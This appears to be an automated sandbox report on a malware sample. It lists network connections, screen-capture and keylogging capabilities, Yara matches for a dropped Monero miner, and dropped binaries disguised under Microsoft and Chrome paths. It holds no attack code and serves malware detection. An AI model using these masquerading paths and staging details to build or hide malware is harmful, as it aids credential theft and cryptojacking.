Source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2054080232.00007FFDF5458000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://www.sqlite.org/copyright.html2
Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49851 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: main.exe.12.dr, utils.cs	.Net Code: desktopScreenshot
Source: Update.exe.21.dr, utils.cs	.Net Code: desktopScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: main.exe.12.dr, utils.cs	.Net Code: KeyboardLayout
Source: Update.exe.21.dr, utils.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB882B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	7_2_00000235BB882B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB88253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	7_2_00000235BB88253C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB8828C8 NtEnumerateValueKey,NtEnumerateValueKey,	7_2_00000235BB8828C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00000235BB88202C NtQuerySystemInformation,StrCmpNIW,	7_2_00000235BB88202C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB887428C8 NtEnumerateValueKey,NtEnumerateValueKey,	8_2_000001EB887428C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8874253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	8_2_000001EB8874253C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB88742244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	8_2_000001EB88742244
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB88742B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	8_2_000001EB88742B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB887427FC NtEnumerateKey,NtEnumerateKey,	8_2_000001EB887427FC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001EB8874202C NtQuerySystemInformation,StrCmpNIW,	8_2_000001EB8874202C

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Code function: 5_2_00367FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

5_2_00367FD3

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\TEMP\gqxqtdeqxchk.sys

Source: C:\Program Files\Google\Chrome\updater.exe

File deleted: C:\Windows\Temp\wxyubnjmnlae.tmp

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB21000	0_2_00007FF6CEB21000
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB29D9B	0_2_00007FF6CEB29D9B
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB41720	0_2_00007FF6CEB41720
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38670	0_2_00007FF6CEB38670
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB46B50	0_2_00007FF6CEB46B50
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB27B60	0_2_00007FF6CEB27B60
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB47A9C	0_2_00007FF6CEB47A9C
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB3E80C	0_2_00007FF6CEB3E80C
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38670	0_2_00007FF6CEB38670
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB4A7D8	0_2_00007FF6CEB4A7D8
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB29F3B	0_2_00007FF6CEB29F3B
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB36750	0_2_00007FF6CEB36750
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB2A76D	0_2_00007FF6CEB2A76D
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB32890	0_2_00007FF6CEB32890
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB32070	0_2_00007FF6CEB32070
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB46DCC	0_2_00007FF6CEB46DCC
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB33540	0_2_00007FF6CEB33540
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB47550	0_2_00007FF6CEB47550
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB44EFC	0_2_00007FF6CEB44EFC
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB426C4	0_2_00007FF6CEB426C4
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB33ED0	0_2_00007FF6CEB33ED0
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB38EF4	0_2_00007FF6CEB38EF4
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB32684	0_2_00007FF6CEB32684
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB384BC	0_2_00007FF6CEB384BC
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB32480	0_2_00007FF6CEB32480
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB3ECA0	0_2_00007FF6CEB3ECA0
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB3AC50	0_2_00007FF6CEB3AC50
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB3F320	0_2_00007FF6CEB3F320
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB292D0	0_2_00007FF6CEB292D0
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB342D4	0_2_00007FF6CEB342D4
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB41720	0_2_00007FF6CEB41720
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB32A94	0_2_00007FF6CEB32A94
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB44A60	0_2_00007FF6CEB44A60
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 0_2_00007FF6CEB32274	0_2_00007FF6CEB32274
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 2_2_00007FFDFB3C2F20	2_2_00007FFDFB3C2F20
Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe	Code function: 2_2_00007FFE1A457CA0	2_2_00007FFE1A457CA0
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00369906	5_2_00369906
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0036F963	5_2_0036F963
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0037EA07	5_2_0037EA07
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00378C7E	5_2_00378C7E
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00394044	5_2_00394044
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_003760F7	5_2_003760F7
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00372125	5_2_00372125
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00379111	5_2_00379111
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_003782D0	5_2_003782D0
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0036E394	5_2_0036E394
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00371476	5_2_00371476
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00376445	5_2_00376445
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00387738	5_2_00387738
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0037976F	5_2_0037976F
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00387967	5_2_00387967
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00370949	5_2_00370949
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00363AB7	5_2_00363AB7
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0038FA90	5_2_0038FA90
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00364C6E	5_2_00364C6E
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00375E86	5_2_00375E86
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_0038FF3E	5_2_0038FF3E
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00370FAC	5_2_00370FAC
Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe	Code function: 5_2_00362FCB	5_2_00362FCB
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647791038	6_2_00007FF647791038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787F4C	6_2_00007FF647787F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647796470	6_2_00007FF647796470
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477973BC	6_2_00007FF6477973BC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647777960	6_2_00007FF647777960
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477790D0	6_2_00007FF6477790D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64779A0F8	6_2_00007FF64779A0F8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64778E11C	6_2_00007FF64778E11C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787F4C	6_2_00007FF647787F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477887D0	6_2_00007FF6477887D0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647791FE4	6_2_00007FF647791FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477837E0	6_2_00007FF6477837E0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64779481C	6_2_00007FF64779481C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647786030	6_2_00007FF647786030
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647771F50	6_2_00007FF647771F50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647781F94	6_2_00007FF647781F94
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477966EC	6_2_00007FF6477966EC
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647782E50	6_2_00007FF647782E50
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647796E70	6_2_00007FF647796E70
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647781D90	6_2_00007FF647781D90
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647787D98	6_2_00007FF647787D98
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64778E5B0	6_2_00007FF64778E5B0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64778A530	6_2_00007FF64778A530
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647783BE4	6_2_00007FF647783BE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF64778EC30	6_2_00007FF64778EC30
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647794380	6_2_00007FF647794380
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647781B84	6_2_00007FF647781B84
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647791038	6_2_00007FF647791038
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477823A4	6_2_00007FF6477823A4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF647781980	6_2_00007FF647781980
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6477821A0	6_2_00007FF6477821A0
